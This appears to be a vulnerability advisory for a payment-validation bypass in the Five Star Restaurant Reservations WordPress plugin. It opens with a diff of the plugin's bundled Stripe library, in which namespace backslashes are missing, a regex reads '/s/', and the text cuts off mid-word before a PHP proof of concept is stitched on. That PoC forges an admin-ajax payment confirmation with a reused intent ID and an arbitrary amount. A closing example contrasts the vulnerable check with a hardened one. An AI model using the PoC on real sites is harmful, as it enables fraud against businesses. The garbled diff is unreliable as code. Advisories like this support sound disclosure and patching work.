 <?php

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Class ApiResource.
@@ -10,7 +10,7 @@
     use ApiOperationsRequest;

     /**
-     * @return StripeUtilSet A list of fields that can be their own type of
+     * @return rtbStripeUtilSet A list of fields that can be their own type of
      * API resource (say a nested card under an account for example), and if
      * that resource is set, it should be transmitted to the API on a create or
      * update. Doing so is not the default behavior because API resources
--- a/restaurant-reservations/lib/stripe/lib/ApiResponse.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiResponse.php
@@ -1,8 +1,8 @@
 <?php

-namespace Stripe;
+namespace rtbStripe;

-use StripeUtilCaseInsensitiveArray;
+use rtbStripeUtilCaseInsensitiveArray;

 /**
  * Class ApiResponse.
--- a/restaurant-reservations/lib/stripe/lib/ApplePayDomain.php
+++ b/restaurant-reservations/lib/stripe/lib/ApplePayDomain.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * @property string $id Unique identifier for the object.
--- a/restaurant-reservations/lib/stripe/lib/ApplicationFee.php
+++ b/restaurant-reservations/lib/stripe/lib/ApplicationFee.php
@@ -2,23 +2,23 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * @property string $id Unique identifier for the object.
  * @property string $object String representing the object's type. Objects of the same type share the same value.
- * @property string|StripeAccount $account ID of the Stripe account this fee was taken from.
+ * @property string|rtbStripeAccount $account ID of the Stripe account this fee was taken from.
  * @property int $amount Amount earned, in %s.
  * @property int $amount_refunded Amount in %s refunded (can be less than the amount attribute on the fee if a partial refund was issued)
- * @property string|StripeStripeObject $application ID of the Connect application that earned the fee.
- * @property null|string|StripeBalanceTransaction $balance_transaction Balance transaction that describes the impact of this collected application fee on your account balance (not including refunds).
- * @property string|StripeCharge $charge ID of the charge that the application fee was taken from.
+ * @property string|rtbStripeStripeObject $application ID of the Connect application that earned the fee.
+ * @property null|string|rtbStripeBalanceTransaction $balance_transaction Balance transaction that describes the impact of this collected application fee on your account balance (not including refunds).
+ * @property string|rtbStripeCharge $charge ID of the charge that the application fee was taken from.
  * @property int $created Time at which the object was created. Measured in seconds since the Unix epoch.
  * @property string $currency Three-letter <a href="https://www.iso.org/iso-4217-currency-codes.html">ISO currency code</a>, in lowercase. Must be a <a href="https://stripe.com/docs/currencies">supported currency</a>.
  * @property bool $livemode Has the value <code>true</code> if the object exists in live mode or the value <code>false</code> if the object exists in test mode.
- * @property null|string|StripeCharge $originating_transaction ID of the corresponding charge on the platform account, if this fee was the result of a charge using the <code>destination</code> parameter.
+ * @property null|string|rtbStripeCharge $originating_transaction ID of the corresponding charge on the platform account, if this fee was the result of a charge using the <code>destination</code> parameter.
  * @property bool $refunded Whether the fee has been fully refunded. If the fee is only partially refunded, this attribute will still be false.
- * @property StripeCollection $refunds A list of refunds that have been applied to the fee.
+ * @property rtbStripeCollection $refunds A list of refunds that have been applied to the fee.
  */
 class ApplicationFee extends ApiResource
 {
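Review bot: this file carries the marker `// File generated from our OpenAPI spec`, yet the hunk rewrites its namespace and docblock types in place, so a later regeneration or vendor update would overwrite these edits. Suggest applying the `rtbStripe` prefix through a repeatable build step and recording the upstream library version next to it, so that functional changes in the same release can be reviewed separately from this mechanical rename.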
@@ -35,9 +35,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of fee refunds
+     * @return rtbStripeCollection the list of fee refunds
      */
     public static function allRefunds($id, $params = null, $opts = null)
     {
@@ -49,9 +49,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeApplicationFeeRefund
+     * @return rtbStripeApplicationFeeRefund
      */
     public static function createRefund($id, $params = null, $opts = null)
     {
@@ -64,9 +64,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeApplicationFeeRefund
+     * @return rtbStripeApplicationFeeRefund
      */
     public static function retrieveRefund($id, $refundId, $params = null, $opts = null)
     {
@@ -79,9 +79,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeApplicationFeeRefund
+     * @return rtbStripeApplicationFeeRefund
      */
     public static function updateRefund($id, $refundId, $params = null, $opts = null)
     {
--- a/restaurant-reservations/lib/stripe/lib/ApplicationFeeRefund.php
+++ b/restaurant-reservations/lib/stripe/lib/ApplicationFeeRefund.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * <code>Application Fee Refund</code> objects allow you to refund an application
@@ -16,11 +16,11 @@
  * @property string $id Unique identifier for the object.
  * @property string $object String representing the object's type. Objects of the same type share the same value.
  * @property int $amount Amount, in %s.
- * @property null|string|StripeBalanceTransaction $balance_transaction Balance transaction that describes the impact on your account balance.
+ * @property null|string|rtbStripeBalanceTransaction $balance_transaction Balance transaction that describes the impact on your account balance.
  * @property int $created Time at which the object was created. Measured in seconds since the Unix epoch.
  * @property string $currency Three-letter <a href="https://www.iso.org/iso-4217-currency-codes.html">ISO currency code</a>, in lowercase. Must be a <a href="https://stripe.com/docs/currencies">supported currency</a>.
- * @property string|StripeApplicationFee $fee ID of the application fee that was refunded.
- * @property null|StripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
+ * @property string|rtbStripeApplicationFee $fee ID of the application fee that was refunded.
+ * @property null|rtbStripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
  */
 class ApplicationFeeRefund extends ApiResource
 {
--- a/restaurant-reservations/lib/stripe/lib/Balance.php
+++ b/restaurant-reservations/lib/stripe/lib/Balance.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * This is an object representing your Stripe balance. You can retrieve it to see
@@ -20,12 +20,12 @@
  * Account Balances</a>.
  *
  * @property string $object String representing the object's type. Objects of the same type share the same value.
- * @property StripeStripeObject[] $available Funds that are available to be transferred or paid out, whether automatically by Stripe or explicitly via the <a href="https://stripe.com/docs/api#transfers">Transfers API</a> or <a href="https://stripe.com/docs/api#payouts">Payouts API</a>. The available balance for each currency and payment type can be found in the <code>source_types</code> property.
- * @property StripeStripeObject[] $connect_reserved Funds held due to negative balances on connected Custom accounts. The connect reserve balance for each currency and payment type can be found in the <code>source_types</code> property.
- * @property StripeStripeObject[] $instant_available Funds that can be paid out using Instant Payouts.
- * @property StripeStripeObject $issuing
+ * @property rtbStripeStripeObject[] $available Funds that are available to be transferred or paid out, whether automatically by Stripe or explicitly via the <a href="https://stripe.com/docs/api#transfers">Transfers API</a> or <a href="https://stripe.com/docs/api#payouts">Payouts API</a>. The available balance for each currency and payment type can be found in the <code>source_types</code> property.
+ * @property rtbStripeStripeObject[] $connect_reserved Funds held due to negative balances on connected Custom accounts. The connect reserve balance for each currency and payment type can be found in the <code>source_types</code> property.
+ * @property rtbStripeStripeObject[] $instant_available Funds that can be paid out using Instant Payouts.
+ * @property rtbStripeStripeObject $issuing
  * @property bool $livemode Has the value <code>true</code> if the object exists in live mode or the value <code>false</code> if the object exists in test mode.
- * @property StripeStripeObject[] $pending Funds that are not yet available in the balance, due to the 7-day rolling pay cycle. The pending balance for each currency, and for each payment type, can be found in the <code>source_types</code> property.
+ * @property rtbStripeStripeObject[] $pending Funds that are not yet available in the balance, due to the 7-day rolling pay cycle. The pending balance for each currency, and for each payment type, can be found in the <code>source_types</code> property.
  */
 class Balance extends SingletonApiResource
 {
@@ -34,9 +34,9 @@
     /**
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBalance
+     * @return rtbStripeBalance
      */
     public static function retrieve($opts = null)
     {
--- a/restaurant-reservations/lib/stripe/lib/BalanceTransaction.php
+++ b/restaurant-reservations/lib/stripe/lib/BalanceTransaction.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Balance transactions represent funds moving through your Stripe account. They're
@@ -22,10 +22,10 @@
  * @property null|string $description An arbitrary string attached to the object. Often useful for displaying to users.
  * @property null|float $exchange_rate The exchange rate used, if applicable, for this transaction. Specifically, if money was converted from currency A to currency B, then the <code>amount</code> in currency A, times <code>exchange_rate</code>, would be the <code>amount</code> in currency B. For example, suppose you charged a customer 10.00 EUR. Then the PaymentIntent's <code>amount</code> would be <code>1000</code> and <code>currency</code> would be <code>eur</code>. Suppose this was converted into 12.34 USD in your Stripe account. Then the BalanceTransaction's <code>amount</code> would be <code>1234</code>, <code>currency</code> would be <code>usd</code>, and <code>exchange_rate</code> would be <code>1.234</code>.
  * @property int $fee Fees (in %s) paid for this transaction.
- * @property StripeStripeObject[] $fee_details Detailed breakdown of fees (in %s) paid for this transaction.
+ * @property rtbStripeStripeObject[] $fee_details Detailed breakdown of fees (in %s) paid for this transaction.
  * @property int $net Net amount of the transaction, in %s.
  * @property string $reporting_category <a href="https://stripe.com/docs/reports/reporting-categories">Learn more</a> about how reporting categories can help you understand balance transactions from an accounting perspective.
- * @property null|string|StripeStripeObject $source The Stripe object to which this transaction is related.
+ * @property null|string|rtbStripeStripeObject $source The Stripe object to which this transaction is related.
  * @property string $status If the transaction's net funds are available in the Stripe balance yet. Either <code>available</code> or <code>pending</code>.
  * @property string $type Transaction type: <code>adjustment</code>, <code>advance</code>, <code>advance_funding</code>, <code>anticipation_repayment</code>, <code>application_fee</code>, <code>application_fee_refund</code>, <code>charge</code>, <code>connect_collection_transfer</code>, <code>contribution</code>, <code>issuing_authorization_hold</code>, <code>issuing_authorization_release</code>, <code>issuing_dispute</code>, <code>issuing_transaction</code>, <code>payment</code>, <code>payment_failure_refund</code>, <code>payment_refund</code>, <code>payout</code>, <code>payout_cancel</code>, <code>payout_failure</code>, <code>refund</code>, <code>refund_failure</code>, <code>reserve_transaction</code>, <code>reserved_funds</code>, <code>stripe_fee</code>, <code>stripe_fx_fee</code>, <code>tax_fee</code>, <code>topup</code>, <code>topup_reversal</code>, <code>transfer</code>, <code>transfer_cancel</code>, <code>transfer_failure</code>, or <code>transfer_refund</code>. <a href="https://stripe.com/docs/reports/balance-transaction-types">Learn more</a> about balance transaction types and what they represent. If you are looking to classify transactions for accounting purposes, you might want to consider <code>reporting_category</code> instead.
  */
--- a/restaurant-reservations/lib/stripe/lib/BankAccount.php
+++ b/restaurant-reservations/lib/stripe/lib/BankAccount.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * These bank accounts are payment methods on <code>Customer</code> objects.
@@ -20,18 +20,18 @@
  *
  * @property string $id Unique identifier for the object.
  * @property string $object String representing the object's type. Objects of the same type share the same value.
- * @property null|string|StripeAccount $account The ID of the account that the bank account is associated with.
+ * @property null|string|rtbStripeAccount $account The ID of the account that the bank account is associated with.
  * @property null|string $account_holder_name The name of the person or business that owns the bank account.
  * @property null|string $account_holder_type The type of entity that holds the account. This can be either <code>individual</code> or <code>company</code>.
  * @property null|string[] $available_payout_methods A set of available payout methods for this bank account. Only values from this set should be passed as the <code>method</code> when creating a payout.
  * @property null|string $bank_name Name of the bank associated with the routing number (e.g., <code>WELLS FARGO</code>).
  * @property string $country Two-letter ISO code representing the country the bank account is located in.
  * @property string $currency Three-letter <a href="https://stripe.com/docs/payouts">ISO code for the currency</a> paid out to the bank account.
- * @property null|string|StripeCustomer $customer The ID of the customer that the bank account is associated with.
+ * @property null|string|rtbStripeCustomer $customer The ID of the customer that the bank account is associated with.
  * @property null|bool $default_for_currency Whether this bank account is the default external account for its currency.
  * @property null|string $fingerprint Uniquely identifies this particular bank account. You can use this attribute to check whether two bank accounts are the same.
  * @property string $last4 The last four digits of the bank account number.
- * @property null|StripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
+ * @property null|rtbStripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
  * @property null|string $routing_number The routing transit number for the bank account.
  * @property string $status <p>For bank accounts, possible values are <code>new</code>, <code>validated</code>, <code>verified</code>, <code>verification_failed</code>, or <code>errored</code>. A bank account that hasn't had any activity or validation performed is <code>new</code>. If Stripe can determine that the bank account exists, its status will be <code>validated</code>. Note that there often isn’t enough information to know (e.g., for smaller credit unions), and the validation is not always run. If customer bank account verification has succeeded, the bank account status will be <code>verified</code>. If the verification failed for any reason, such as microdeposit failure, the status will be <code>verification_failed</code>. If a transfer sent to this bank account fails, we'll set the status to <code>errored</code> and will not continue to send transfers until the bank details are updated.</p><p>For external accounts, possible values are <code>new</code> and <code>errored</code>. Validations aren't run against external accounts because they're only used for payouts. This means the other statuses don't apply. If a transfer fails, the status is set to <code>errored</code> and transfers are stopped until account details are updated.</p>
  */
@@ -82,7 +82,7 @@
      * @param array|string $_id
      * @param null|array|string $_opts
      *
-     * @throws StripeExceptionBadMethodCallException
+     * @throws rtbStripeExceptionBadMethodCallException
      */
     public static function retrieve($_id, $_opts = null)
     {
@@ -100,7 +100,7 @@
      * @param null|array $_params
      * @param null|array|string $_options
      *
-     * @throws StripeExceptionBadMethodCallException
+     * @throws rtbStripeExceptionBadMethodCallException
      */
     public static function update($_id, $_params = null, $_options = null)
     {
@@ -117,7 +117,7 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return BankAccount the verified bank account
      */
--- a/restaurant-reservations/lib/stripe/lib/BaseStripeClient.php
+++ b/restaurant-reservations/lib/stripe/lib/BaseStripeClient.php
@@ -1,6 +1,6 @@
 <?php

-namespace Stripe;
+namespace rtbStripe;

 class BaseStripeClient implements StripeClientInterface
 {
@@ -16,7 +16,7 @@
     /** @var array<string, mixed> */
     private $config;

-    /** @var StripeUtilRequestOptions */
+    /** @var rtbStripeUtilRequestOptions */
     private $defaultOpts;

     /**
@@ -52,7 +52,7 @@
         if (is_string($config)) {
             $config = ['api_key' => $config];
         } elseif (!is_array($config)) {
-            throw new StripeExceptionInvalidArgumentException('$config must be a string or an array');
+            throw new rtbStripeExceptionInvalidArgumentException('$config must be a string or an array');
         }

         $config = array_merge($this->getDefaultConfig(), $config);
@@ -60,7 +60,7 @@

         $this->config = $config;

-        $this->defaultOpts = StripeUtilRequestOptions::parse([
+        $this->defaultOpts = rtbStripeUtilRequestOptions::parse([
             'stripe_account' => $config['stripe_account'],
             'stripe_version' => $config['stripe_version'],
         ]);
@@ -122,18 +122,18 @@
      * @param string $method the HTTP method
      * @param string $path the path of the request
      * @param array $params the parameters of the request
-     * @param array|StripeUtilRequestOptions $opts the special modifiers of the request
+     * @param array|rtbStripeUtilRequestOptions $opts the special modifiers of the request
      *
-     * @return StripeStripeObject the object returned by Stripe's API
+     * @return rtbStripeStripeObject the object returned by Stripe's API
      */
     public function request($method, $path, $params, $opts)
     {
         $opts = $this->defaultOpts->merge($opts, true);
         $baseUrl = $opts->apiBase ?: $this->getApiBase();
-        $requestor = new StripeApiRequestor($this->apiKeyForRequest($opts), $baseUrl);
+        $requestor = new rtbStripeApiRequestor($this->apiKeyForRequest($opts), $baseUrl);
         list($response, $opts->apiKey) = $requestor->request($method, $path, $params, $opts->headers);
         $opts->discardNonPersistentHeaders();
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
         $obj->setLastResponse($response);

         return $obj;
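Review bot: in `request()`, the returned object now comes from `rtbStripeUtilUtil::convertToStripeObject($response->json, $opts)`, and `requestCollection()` in the next hunk tests it with `instanceof rtbStripeCollection`; both only hold if the type-to-class map behind `convertToStripeObject` was re-prefixed in the same commit. That map is not part of this hunk, so please verify it: a leftover reference to the unprefixed classes would either fail to load or resolve to another copy of the library and fail the `instanceof` check.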
@@ -145,18 +145,18 @@
      * @param string $method the HTTP method
      * @param string $path the path of the request
      * @param array $params the parameters of the request
-     * @param array|StripeUtilRequestOptions $opts the special modifiers of the request
+     * @param array|rtbStripeUtilRequestOptions $opts the special modifiers of the request
      *
-     * @return StripeCollection of ApiResources
+     * @return rtbStripeCollection of ApiResources
      */
     public function requestCollection($method, $path, $params, $opts)
     {
         $obj = $this->request($method, $path, $params, $opts);
-        if (!($obj instanceof StripeCollection)) {
+        if (!($obj instanceof rtbStripeCollection)) {
             $received_class = get_class($obj);
-            $msg = "Expected to receive `Stripe\Collection` object from Stripe API. Instead received `{$received_class}`.";
+            $msg = "Expected to receive `rtbStripe\Collection` object from Stripe API. Instead received `{$received_class}`.";

-            throw new StripeExceptionUnexpectedValueException($msg);
+            throw new rtbStripeExceptionUnexpectedValueException($msg);
         }
         $obj->setFilters($params);

@@ -164,9 +164,9 @@
     }

     /**
-     * @param StripeUtilRequestOptions $opts
+     * @param rtbStripeUtilRequestOptions $opts
      *
-     * @throws StripeExceptionAuthenticationException
+     * @throws rtbStripeExceptionAuthenticationException
      *
      * @return string
      */
@@ -179,7 +179,7 @@
                 . 'StripeClient instance, or provide it on a per-request basis '
                 . 'using the `api_key` key in the $opts argument.';

-            throw new StripeExceptionAuthenticationException($msg);
+            throw new rtbStripeExceptionAuthenticationException($msg);
         }

         return $apiKey;
@@ -206,55 +206,55 @@
     /**
      * @param array<string, mixed> $config
      *
-     * @throws StripeExceptionInvalidArgumentException
+     * @throws rtbStripeExceptionInvalidArgumentException
      */
     private function validateConfig($config)
     {
         // api_key
         if (null !== $config['api_key'] && !is_string($config['api_key'])) {
-            throw new StripeExceptionInvalidArgumentException('api_key must be null or a string');
+            throw new rtbStripeExceptionInvalidArgumentException('api_key must be null or a string');
         }

         if (null !== $config['api_key'] && ('' === $config['api_key'])) {
             $msg = 'api_key cannot be the empty string';

-            throw new StripeExceptionInvalidArgumentException($msg);
+            throw new rtbStripeExceptionInvalidArgumentException($msg);
         }

         if (null !== $config['api_key'] && (preg_match('/s/', $config['api_key']))) {
             $msg = 'api_key cannot contain whitespace';

-            throw new StripeExceptionInvalidArgumentException($msg);
+            throw new rtbStripeExceptionInvalidArgumentException($msg);
         }

         // client_id
         if (null !== $config['client_id'] && !is_string($config['client_id'])) {
-            throw new StripeExceptionInvalidArgumentException('client_id must be null or a string');
+            throw new rtbStripeExceptionInvalidArgumentException('client_id must be null or a string');
         }

         // stripe_account
         if (null !== $config['stripe_account'] && !is_string($config['stripe_account'])) {
-            throw new StripeExceptionInvalidArgumentException('stripe_account must be null or a string');
+            throw new rtbStripeExceptionInvalidArgumentException('stripe_account must be null or a string');
         }

         // stripe_version
         if (null !== $config['stripe_version'] && !is_string($config['stripe_version'])) {
-            throw new StripeExceptionInvalidArgumentException('stripe_version must be null or a string');
+            throw new rtbStripeExceptionInvalidArgumentException('stripe_version must be null or a string');
         }

         // api_base
         if (!is_string($config['api_base'])) {
-            throw new StripeExceptionInvalidArgumentException('api_base must be a string');
+            throw new rtbStripeExceptionInvalidArgumentException('api_base must be a string');
         }

         // connect_base
         if (!is_string($config['connect_base'])) {
-            throw new StripeExceptionInvalidArgumentException('connect_base must be a string');
+            throw new rtbStripeExceptionInvalidArgumentException('connect_base must be a string');
         }

         // files_base
         if (!is_string($config['files_base'])) {
-            throw new StripeExceptionInvalidArgumentException('files_base must be a string');
+            throw new rtbStripeExceptionInvalidArgumentException('files_base must be a string');
         }

         // check absence of extra keys
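Review bot: the whitespace check on `api_key` in `validateConfig()` reads `preg_match('/s/', $config['api_key'])`, which matches a literal `s` rather than whitespace and would reject any key containing that letter with 'api_key cannot contain whitespace'. The line is unchanged context here, so this is probably a backslash lost from `/\s/` in rendering, but it should be confirmed in the shipped file since the patch edits the lines on either side of it.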
@@ -263,7 +263,7 @@
             // Wrap in single quote to more easily catch trailing spaces errors
             $invalidKeys = "'" . implode("', '", $extraConfigKeys) . "'";

-            throw new StripeExceptionInvalidArgumentException('Found unknown key(s) in configuration array: ' . $invalidKeys);
+            throw new rtbStripeExceptionInvalidArgumentException('Found unknown key(s) in configuration array: ' . $invalidKeys);
         }
     }
 }
--- a/restaurant-reservations/lib/stripe/lib/BillingPortal/Configuration.php
+++ b/restaurant-reservations/lib/stripe/lib/BillingPortal/Configuration.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace StripeBillingPortal;
+namespace rtbStripeBillingPortal;

 /**
  * A portal configuration describes the functionality and behavior of a portal
@@ -12,20 +12,20 @@
  * @property string $object String representing the object's type. Objects of the same type share the same value.
  * @property bool $active Whether the configuration is active and can be used to create portal sessions.
  * @property null|string $application ID of the Connect Application that created the configuration.
- * @property StripeStripeObject $business_profile
+ * @property rtbStripeStripeObject $business_profile
  * @property int $created Time at which the object was created. Measured in seconds since the Unix epoch.
  * @property null|string $default_return_url The default URL to redirect customers to when they click on the portal's link to return to your website. This can be <a href="https://stripe.com/docs/api/customer_portal/sessions/create#create_portal_session-return_url">overriden</a> when creating the session.
- * @property StripeStripeObject $features
+ * @property rtbStripeStripeObject $features
  * @property bool $is_default Whether the configuration is the default. If <code>true</code>, this configuration can be managed in the Dashboard and portal sessions will use this configuration unless it is overriden when creating the session.
  * @property bool $livemode Has the value <code>true</code> if the object exists in live mode or the value <code>false</code> if the object exists in test mode.
  * @property int $updated Time at which the object was last updated. Measured in seconds since the Unix epoch.
  */
-class Configuration extends StripeApiResource
+class Configuration extends rtbStripeApiResource
 {
     const OBJECT_NAME = 'billing_po

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-54830 - Five Star Restaurant Reservations – WordPress Booking Plugin <= 2.7.19 - Missing Authorization

$target_url = 'http://example.com'; // Change this to the target WordPress site URL

$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// Step 1: Obtain a valid booking ID (in a real attack, this might be obtained from booking form)
// For demonstration, we assume we have a booking ID from a previous legitimate submission
$booking_id = 1; // This would normally be fetched from the booking

// Step 2: The attacker needs a valid payment_intent_id. In the vulnerable version,
// the attacker can simply guess or brute-force a stored intent ID, or reuse one from a legitimate booking.
// The patch adds server-side verification; the older version only compared the posted payment_id
// against the stored value. If the attacker can obtain any valid stripe_payment_intent_id (e.g., from a previous booking),
// they can reuse it.

// For demonstration, we assume the attacker knows or has leaked a valid stripe_payment_intent_id
$stripe_payment_intent_id = 'pi_1234567890abcdef'; // This would need to exist in the database

// Step 3: Craft the POST data to trigger the payment confirmation action
// The exact action name depends on the plugin's AJAX hooks; common patterns include 'rtb_process_payment' or similar.
// Here we use a generic AJAX action that processes payment for a given booking.
$post_data = array(
    'action' => 'rtb_process_payment', // Varies per plugin version; may need adjustment
    'booking_id' => $booking_id,
    'payment_id' => $stripe_payment_intent_id,
    'payment_amount' => 1000, // Attacker can set amount to 10.00 (or any value) without real payment
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_code\n";
echo "Response: " . htmlspecialchars($response) . "\n";

if (false !== strpos($response, 'success')) {
    echo "[+] Vulnerability confirmed: Payment validation bypassed without actual payment.\n";
} else {
    echo "[-] Exploit might have failed; check action name or parameters.\n";
    echo "[*] Note: The plugin might require a valid nonce or different action name.\n";
}
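
The comparison the PoC relies on, beside a server-verified check of the kind the patch analysis describes, as an added PHP example that is not the plugin's or Atomic Edge's code. The function names, array shapes and the `$fetch_intent` callable (a stand-in for the server-side Stripe lookup) are assumptions, and the intents are constructed sample data.

```php
<?php
// Added illustration. Function names, array keys and sample data are hypothetical,
// not the plugin's code. $fetch_intent stands in for a server-side Stripe lookup.

// Pre-patch logic as the advisory describes it: the stored intent ID is
// non-empty and equals the posted payment_id. Nothing proves a payment happened.
function valid_payment_vulnerable(array $booking, array $post): bool {
    return !empty($booking['stripe_payment_intent_id'])
        && $booking['stripe_payment_intent_id'] === ($post['payment_id'] ?? '');
}

// Patched behaviour as described: look the stored intent up server-side, require
// the expected status, and take the amount from the verified intent, never from $post.
// Returns the verified amount in minor units, or null when the payment is not valid.
function valid_payment_hardened(array $booking, callable $fetch_intent, bool $hold = false): ?int {
    $id = $booking['stripe_payment_intent_id'] ?? '';
    if ($id === '') {
        return null;
    }
    $intent = $fetch_intent($id);
    if (!is_array($intent) || ($intent['id'] ?? null) !== $id) {
        return null; // lookup failed or returned a different object
    }
    $expected = $hold ? 'requires_capture' : 'succeeded';
    if (($intent['status'] ?? '') !== $expected) {
        return null;
    }
    return (int) $intent['amount'];
}

// Constructed sample data: one intent created but never paid, one paid.
$intents = [
    'pi_constructed_unpaid' => ['id' => 'pi_constructed_unpaid', 'status' => 'requires_payment_method', 'amount' => 2500],
    'pi_constructed_paid'   => ['id' => 'pi_constructed_paid', 'status' => 'succeeded', 'amount' => 2500],
];
$fetch = fn(string $id) => $intents[$id] ?? null;

// Booking whose intent was never paid; the client echoes the ID and picks its own amount.
$booking = ['stripe_payment_intent_id' => 'pi_constructed_unpaid'];
$post    = ['payment_id' => 'pi_constructed_unpaid', 'payment_amount' => 1000];

var_dump(valid_payment_vulnerable($booking, $post)); // old check, unpaid intent
var_dump(valid_payment_hardened($booking, $fetch));  // new check, unpaid intent
var_dump(valid_payment_hardened(['stripe_payment_intent_id' => 'pi_constructed_paid'], $fetch)); // new check, paid intent
```

The hardened function never reads `$post`, so a client-supplied `payment_amount` has no path into the stored deposit.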
